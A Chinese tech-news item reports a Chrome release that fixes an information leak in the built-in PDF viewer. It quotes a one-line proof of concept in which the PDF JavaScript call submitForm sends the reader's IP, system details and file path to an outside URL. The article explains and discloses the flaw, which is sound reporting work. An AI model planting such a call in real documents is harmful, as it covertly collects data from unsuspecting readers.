手机版
你好,游客 登录 注册
背景:
阅读新闻

Google Chrome 72.0.3626.121 发布,修复PDF组件泄漏信息漏洞

[日期:2019-03-04] 来源:Linux公社  作者:醉落红尘 [字体: ]

Google Chrome团队已向所有官方用户发布了版本v72.0.3626.121,这是自上一次正式发布以来的第三个维护版本。此更新中没有新功能和改进,主要用于修复已知问题。此修复程序的问题是提前曝出的PDF组件泄漏漏洞。

 Chrome 72.0.3626.121 截图

此前,研究人员发现Google Chrome内置的PDF组件存在漏洞。执行恶意文档时,会将信息发送到两个未知的服务器。 Chrome中打开pdf文件的漏洞可能会泄露用户的信息。成功利用此漏洞可能会导致目标用户的IP地址和其他信息泄露。

“The root is the “this.submitForm()” PDF Javascript API. 我们使用最小的PoC进行了测试,像 “this.submitForm(‘http://google.com/test’)”这样的简单API调用将使Google Chrome将个人信息发送到google.com。

可能泄露的信息包括:

  • 用户的公共IP地址。
  • 操作系统,Chrome版本等(在HTTP POST标头中)。
  • 用户计算机上PDF文件的完整路径(在HTTP POST有效负载中)。

您应该将Chrome浏览器更新到最新版本以修复此漏洞。

Linux公社的RSS地址https://www.linuxidc.com/rssFeed.aspx

本文永久更新链接地址https://www.linuxidc.com/Linux/2019-03/157258.htm

linux
相关资讯       Chrome 72.0.3626.121 
本文评论   查看全部评论 (0)
表情: 表情 姓名: 字数

       

评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款